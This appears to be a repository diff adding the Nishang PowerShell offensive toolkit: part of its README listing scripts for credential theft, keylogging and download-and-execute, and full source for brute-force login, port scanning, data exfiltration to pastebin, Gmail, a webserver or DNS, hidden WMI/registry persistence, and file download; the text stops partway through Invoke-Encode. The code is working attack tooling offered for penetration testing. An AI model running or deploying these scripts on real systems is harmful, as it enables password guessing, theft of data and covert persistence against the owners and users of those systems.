[Download_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1)
Download an executable in text format, convert to executable and execute.
[Execute-Command-MSSQL](https://github.com/samratashok/nishang/blob/master/Execution/Execute-Command-MSSQL.ps1)
Run powershell commands, native commands or SQL commands on a MSSQL Server with sufficient privileges.
[Execute-DNSTXT-Code](https://github.com/samratashok/nishang/blob/master/Execution/Execute-DNSTXT-Code.ps1)
Execute shellcode in memeory using DNS TXT queries.
#####Gather
[Check-VM](https://github.com/samratashok/nishang/blob/master/Gather/Check-VM.ps1)
Check for Virtual Machine
[Copy-VSS](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1)
Copy the SAM file using Volume Shadow Service.
[Credentials](https://github.com/samratashok/nishang/blob/master/Gather/Credentials.ps1)
Fool a user to give credentials in plain text.
[FireBuster](https://github.com/samratashok/nishang/blob/master/Gather/FireBuster.ps1)
[FireListener](https://github.com/samratashok/nishang/blob/master/Gather/FireListener.ps1)
A pair of scripts for Egress Testing
[Get-Information](https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1)
Get juicy information from a target.
[Get-LSASecret](https://github.com/samratashok/nishang/blob/master/Gather/Get-LSASecret.ps1)
Get LSA Secret from a target.
[Get-PassHashes](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1)
Get password hashes from a target.
[Get-WLAN-Keys](https://github.com/samratashok/nishang/blob/master/Gather/Get-WLAN-Keys.ps1)
Get WLAN keys in plain from a target.
[Keylogger](https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1)
Log keys from a target.
#####Pivot
[Create-MultipleSessions](https://github.com/samratashok/nishang/blob/master/Pivot/Create-MultipleSessions.ps1)
Check credentials on multiple computers and create PSSessions.
[Run-EXEonRemote](https://github.com/samratashok/nishang/blob/master/Pivot/Run-EXEonRemote.ps1)
Copy and execute an executable on multiple machines.
#####Prasadhak
[Prasadhak](https://github.com/samratashok/nishang/blob/master/Prasadhak/Prasadhak.ps1)
Check running hashes of running process against Virus Total database.
#####Scan
[Brute-Force](https://github.com/samratashok/nishang/blob/master/Scan/Brute-Force.ps1)
Brute force FTP, Active Directory, MS SQL Server and Sharepoint.
[Port-Scan](https://github.com/samratashok/nishang/blob/master/Scan/Port-Scan.ps1)
A handy port scanner.
#####Powerpreter
[Powerpreter](https://github.com/samratashok/nishang/tree/master/powerpreter)
All the functionality of nishang in a single script module.
#####Utility
[Add-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Add-Exfiltration.ps1)
Add data exfiltration capability to gmail,pastebin, webserver and DNS to any script.
[Add-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Add-Persistence.ps1)
Add Reboot persistence capability to a script.
[Remove-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Remove-Persistence.ps1)
Remoce persistence added by the Add-Persistence script.
[Do-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1)
Pipe (|) this to any script to exfiltrate the output.
[Download](https://github.com/samratashok/nishang/blob/master/Utility/Download.ps1)
Download a file to the target.
[Parse_Keys](https://github.com/samratashok/nishang/blob/master/Utility/Parse_Keys.ps1)
Parse keys logged by the Keylogger.
[Invoke-Encode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1)
Encode and Compress a script or string.
[Invoke-Decode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1)
Decode and Decompress a script or string from Invoke-Encode.
[Base64ToString]
[StringToBase64]
[ExetoText]
[TexttoExe]
####Usage
Use the individual scripts with dot sourcing
PS > . .\Get-Information
PS > Get-Information
To get help about any script or payload, use
PS > Get-Help [scriptname.ps1] -full
Import all the scripts in current powershell session
PS > Import-Module .\nishang.psm1
####Updates
Updates about Nishang could be found at my blog http://labofapenetrationtester.com/ and my twitter feed @nikhil_mitt
####Bugs, Feedback and Feature Requests
Please raise an issue if you encounter a bug or have a feature request or mail me at nikhil [dot] uitrgpv at gmail.com
#####Mailing List
For feedback, discussions and feature requests join http://groups.google.com/group/nishang-users
#####Contributing
I am always looking for contributors to Nishang. Please submit requests or drop me email.
#####Blog Posts
Some blog posts to check out for beginners:
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html
http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html
http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html
All posts about Nishang:
http://www.labofapenetrationtester.com/search/label/Nishang

162
aspx/nishang/Scan/Brute-Force.ps1 Normal file
View file

@ -0,0 +1,162 @@
<#
.SYNOPSIS
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.
.DESCRIPTION
This payload tries to login to SQL, ActiveDirectory, Web or FTP using a specific account and password.
You can also specify a password-list as input as shown in the Example section.
.PARAMETER Identity
Specifies a SQL Server, FTP Site or Web Site.
.PARAMETER UserName
Specifies a UserName. If blank, trusted connection will be used for SQL and anonymous access will be used for FTP.
.PARAMETER Password
Specifies a Password.
.PARAMETER Service
Enter a Service. Default service is set to SQL.
.EXAMPLE
PS > Brute-Force -Identity SRV01 -UserName sa -Password ""
.EXAMPLE
PS > Brute-Force -Identity ftp://SRV01 -UserName sa -Password "" -Service FTP
.EXAMPLE
PS > "SRV01","SRV02","SRV03" | Brute-Force -UserName sa -Password sa
.EXAMPLE
PS > Import-CSV .\username.txt | Brute-Force -Identity targetdomain -Password Password1 -Service ActiveDirectory
.EXAMPLE
PS > Brute-Force -Identity "http://www.something.com" -UserName user001 -Password Password1 -Service Web
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Brute-Force {
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLineByPropertyName = $true)]
[Alias("PSComputerName","CN","MachineName","IP","IPAddress","ComputerName","Url","Ftp","Domain","DistinguishedName")]
[string]
$Identity,
[parameter(Position = 1, ValueFromPipeLineByPropertyName = $true)]
[string]
$UserName,
[parameter(Position = 2, ValueFromPipeLineByPropertyName = $true)]
[string]
$Password,
[parameter(Position = 3)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
[string]
$Service = "SQL"
)
Process {
if($service -eq "SQL") {
$Connection = New-Object System.Data.SQLClient.SQLConnection
if($userName) {
$Connection.ConnectionString = "Data Source=$identity;Initial Catalog=Master;User Id=$userName;Password=$password;"
} else {
$Connection.ConnectionString = "server=$identity;Initial Catalog=Master;trusted_connection=true;"
}
Try {
$Connection.Open()
$success = $true
}
Catch {
$success = $false
}
if($success -eq $true) {
$message = switch($connection.ServerVersion) {
{ $_ -match "^6" } { "SQL Server 6.5";Break }
{ $_ -match "^6" } { "SQL Server 7";Break }
{ $_ -match "^8" } { "SQL Server 2000";Break }
{ $_ -match "^9" } { "SQL Server 2005";Break }
{ $_ -match "^10\.00" } { "SQL Server 2008";Break }
{ $_ -match "^10\.50" } { "SQL Server 2008 R2";Break }
Default { "Unknown" }
}
} else {
$message = "Unknown"
}
} elseif($service -eq "FTP") {
if($identity -notMatch "^ftp://") {
$source = "ftp://" + $identity
} else {
$source = $identity
}
try {
$ftpRequest = [System.Net.FtpWebRequest]::Create($source)
$ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
$ftpRequest.Credentials = new-object System.Net.NetworkCredential($userName, $password)
$result = $ftpRequest.GetResponse()
$message = $result.BannerMessage + $result.WelcomeMessage
$success = $true
} catch {
$message = $error[0].ToString()
$success = $false
}
} elseif($service -eq "ActiveDirectory") {
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
Try {
$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $identity)
$success = $true
}
Catch {
$message = "Unable to contact Domain"
$success = $false
}
if($success -ne $false) {
Try {
$success = $principalContext.ValidateCredentials($username, $password)
$message = "Password Match"
}
Catch {
$success = $false
$message = "Password doesn't match"
}
}
} elseif($service -eq "Web") {
if($identity -notMatch "^(http|https)://") {
$source = "http://" + $identity
} else {
$source = $identity
}
$webClient = New-Object Net.WebClient
$securePassword = ConvertTo-SecureString -AsPlainText -String $password -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userName, $securePassword
$webClient.Credentials = $credential
Try {
$message = $webClient.DownloadString($source)
$success = $true
}
Catch {
$success = $false
$message = "Password doesn't match"
}
}
# Return Object
New-Object PSObject -Property @{
ComputerName = $identity;
UserName = $username;
Password = $Password;
Success = $success;
Message = $message
} | Select-Object Success, Message, UserName, Password, ComputerName
}
}

131
aspx/nishang/Scan/Port-Scan.ps1 Normal file
View file

@ -0,0 +1,131 @@
<#
.SYNOPSIS
Nihsang payload which Scan IP-Addresses, Ports and HostNames
.DESCRIPTION
Scan for IP-Addresses, HostNames and open Ports in your Network.
.PARAMETER StartAddress
StartAddress Range
.PARAMETER EndAddress
EndAddress Range
.PARAMETER ResolveHost
Resolve HostName
.PARAMETER ScanPort
Perform a PortScan
.PARAMETER Ports
Ports That should be scanned, default values are: 21,22,23,53,69,71,80,98,110,139,111,
389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,
5801,5900,5555,5901
.PARAMETER TimeOut
Time (in MilliSeconds) before TimeOut, Default set to 100
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TrueSec
#>
function Port-Scan {
[CmdletBinding()] Param(
[parameter(Mandatory = $true, Position = 0)]
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
[string]
$StartAddress,
[parameter(Mandatory = $true, Position = 1)]
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
[string]
$EndAddress,
[switch]
$ResolveHost,
[switch]
$ScanPort,
[int[]]
$Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),
[int]
$TimeOut = 100
)
Begin {
$ping = New-Object System.Net.Networkinformation.Ping
}
Process {
foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {
foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {
foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {
foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {
write-progress -activity PingSweep -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100)
$pingStatus = $ping.Send("$a.$b.$c.$d",$TimeOut)
if($pingStatus.Status -eq "Success") {
if($ResolveHost) {
write-progress -activity ResolveHost -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100) -Id 1
$getHostEntry = [Net.DNS]::BeginGetHostEntry($pingStatus.Address, $null, $null)
}
if($ScanPort) {
$openPorts = @()
for($i = 1; $i -le $ports.Count;$i++) {
$port = $Ports[($i-1)]
write-progress -activity PortScan -status "$a.$b.$c.$d" -percentcomplete (($i/($Ports.Count)) * 100) -Id 2
$client = New-Object System.Net.Sockets.TcpClient
$beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
if($client.Connected) {
$openPorts += $port
} else {
# Wait
Start-Sleep -Milli $TimeOut
if($client.Connected) {
$openPorts += $port
}
}
$client.Close()
}
}
if($ResolveHost) {
$hostName = ([Net.DNS]::EndGetHostEntry([IAsyncResult]$getHostEntry)).HostName
}
# Return Object
New-Object PSObject -Property @{
IPAddress = "$a.$b.$c.$d";
HostName = $hostName;
Ports = $openPorts
} | Select-Object IPAddress, HostName, Ports
}
}
}
}
}
}
End {
}
}

188
aspx/nishang/Utility/Add-Exfiltration.ps1 Normal file
View file

@ -0,0 +1,188 @@
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.
.DESCRIPTION
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
in Utility folder of Nishang.
.PARAMETER Data
The data to be exfiltrated. Could be supplied by pipeline.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.EXAMPLE
PS > Add-Exfiltration -ScriptPath C:\Get-Information.ps1 -FilePath C:\test\Get-Information_exfil.ps1
PS > . .\Get-Information_exfil.ps1
PS > Get-Information | Do-Exfiltration -ExfilOption webserver -URL http://yourwebserver.com
The first command adds exfiltration to Get-Information.ps1 and writes it to Get-Information_exfil.ps1
The second command loads the generated Get-Information_exfil.ps1.
The third command runs the Get-Information function and pipes its output to the Do-Exfiltration function.
See the help of Do-Exfiltraion.ps1 to understand varios options for exfiltration.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Add-Exfiltration
{
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ScriptPath,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$FilePath
)
$Exfiltration = @'
function Do-Exfiltration
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$dev_key,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$username,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$password,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$URL,
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DomainName,
[Parameter(Position = 7, Mandatory = $False)]
[String]
$AuthNS
)
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $Data)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
$pastename = "Exfiltrated Data"
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = "Exfiltrated Data"
$msg.Body = $Data
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
'@
$ScriptContent = Get-Content $ScriptPath
Out-File -InputObject $ScriptContent -FilePath "$Filepath"
Out-File -InputObject $Exfiltration -Append -FilePath "$Filepath"
}

62
aspx/nishang/Utility/Add-Persistence.ps1 Normal file
View file

@ -0,0 +1,62 @@
<#
.SYNOPSIS
Nishang script which could be used to add reboot persistence to a powershell script.
.DESCRIPTION
This script accepts path of a script to which reboot persistence is to be added.
The target sript is dropped into the user's temp directory and either WMI permanent event consumer or Registry changes is used (based on privs) for persistence.
Persistence created using this script could be cleaned by using the Remove-Persistence.ps1 script in Nishang.
.PARAMETER ScriptPath
Path of the script to which persistence is to be added.
.Example
PS > Add-Persistence -ScriptPath C:\script.ps1
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>
function Add-Persistence
{
[CmdletBinding()] Param(
[Parameter(Mandatory = $True)]
[String]
$ScriptPath
)
$body = Get-Content $ScriptPath
$modulename = $script:MyInvocation.MyCommand.Name
$name = "persist.vbs"
Out-File -InputObject $body -Force $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}

57
aspx/nishang/Utility/Base64ToString.ps1 Normal file
View file

@ -0,0 +1,57 @@
<#
.SYNOPSIS
Nishang script which decodes a base64 string to readable.
.DESCRIPTION
This payload decodes a base64 string to readable.
.PARAMETER Base64Strfile
The filename which contains base64 string to be decoded. Default is "decoded.txt" in the current working directory.
Use the parameter -IsString while using a string instead of file.
.EXAMPLE
PS > Base64ToString base64.txt
.EXAMPLE
PS > Base64ToString dGVzdGVzdA== -IsString
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Base64ToString
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Base64Strfile,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$outputfile=".\base64decoded.txt",
[Switch]
$IsString
)
if($IsString -eq $true)
{
$base64string = [System.Convert]::FromBase64String($Base64Strfile)
}
else
{
$base64string = [System.Convert]::FromBase64String((Get-Content $Base64Strfile))
}
$decodedstring = [System.Text.Encoding]::Unicode.GetString($base64string)
$decodedstring
Out-File -InputObject $decodedstring -Encoding ascii -FilePath "$outputfile"
Write-Output "Decoded data written to file $outputfile"
}

172
aspx/nishang/Utility/Do-Exfiltration.ps1 Normal file
View file

@ -0,0 +1,172 @@
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.
.DESCRIPTION
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
in Utility folder of Nishang.
.PARAMETER Data
The data to be exfiltrated. Could be supplied by pipeline.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
Use above command for data exfiltration to gmail
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above command for data exfiltration to a webserver which logs POST requests.
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228
Use above command for data exfiltration to a DNS server which logs TXT queries.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Do-Exfiltration
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$dev_key,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$username,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$password,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$URL,
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DomainName,
[Parameter(Position = 7, Mandatory = $False)]
[String]
$AuthNS
)
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $Data)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
$pastename = "Exfiltrated Data"
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = "Exfiltrated Data"
$msg.Body = $Data
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}

36
aspx/nishang/Utility/Download.ps1 Normal file
View file

@ -0,0 +1,36 @@
<#
.SYNOPSIS
Nishang Payload to download a file in current users temp directory.
.DESCRIPTION
This payload downloads a file to the given location.
.PARAMETER URL
The URL from where the file would be downloaded.
.PARAMETER FileName
Name of the file where download would be saved.
.EXAMPLE
PS > Download http://example.com/file.txt newfile.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$URL,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$FileName
)
$webclient = New-Object System.Net.WebClient
$file = "$env:temp\$FileName"
$webclient.DownloadFile($URL,"$file")
}

37
aspx/nishang/Utility/ExetoText.ps1 Normal file
View file

@ -0,0 +1,37 @@
<#
.SYNOPSIS
Nishang script to convert an executable to text file.
.DESCRIPTION
This script converts and an executable to a text file.
.PARAMETER EXE
The path of the executable to be converted.
.PARAMETER FileName
Path of the text file to which executable will be converted.
.EXAMPLE
PS > ExetoText evil.exe evil.txt
.LINK
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
https://github.com/samratashok/nishang
#>
function ExetoText
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$EXE,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Filename
)
[byte[]] $hexdump = get-content -encoding byte -path "$EXE"
[System.IO.File]::WriteAllLines($Filename, ([string]$hexdump))
Write-Output "Converted file written to $Filename"
}

72
aspx/nishang/Utility/Invoke-Decode.ps1 Normal file
View file

@ -0,0 +1,72 @@
<#
.SYNOPSIS
Script for Nishang to decode the data encoded by Invoke-Encode, DNS TXT and POST exfiltration methods.
.DESCRIPTION
The script asks for an encoded string as an option, decodes it and writes to a file "decoded.txt" in the current working directory.
Both the encoding and decoding is based on the code by ikarstein.
.PARAMETER EncodedData
The path of the file to be decoded. Use with -IsString to enter a string.
.PARAMETER OutputFilePath
The path of the output file. Default is "decoded.txt" in the current working directory.
.PARAMETER IsString
Use this to specify if you are passing a string ins place of a filepath.
.EXAMPLE
PS > Invoke-Decode -EncodedData C:\files\encoded.txt
.EXAMPLE
PS > Invoke-Decode K07MLUosSSzOyM+OycvMzsjM4eUCAA== -IsString
Use above to decode a string.
.LINK
http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
https://github.com/samratashok/nishang
#>
function Invoke-Decode
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$EncodedData,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$OutputFilePath = ".\decoded.txt",
[Switch]
$IsString
)
if($IsString -eq $true)
{
$data = $EncodedData
}
else
{
$data = Get-Content $EncodedData -Encoding UTF8
}
$dec = [System.Convert]::FromBase64String($data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($dec, 0, $dec.Length)
$ms.Seek(0,0) | Out-Null
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$output = $sr.readtoend()
$output
Out-File -InputObject $output -FilePath $OutputFilePath
Write-Host "Decode data written to $OutputFilePath"
}

110
aspx/nishang/Utility/Invoke-Encode.ps1 Normal file
View file

@ -0,0 +1,110 @@
<#
.SYNOPSIS
Script for Nishang to encode and compress plain data.
.DESCRIPTION
The script asks for a path to a plain file, encodes it and writes to a file "encoded.txt" in the current working directory.
If the switch OutCommand is used. An encoded command which could be executed on a powershell console is also generated.
The encoded command is useful in case of non-interactive shells like webshell or when special characters in scripts may
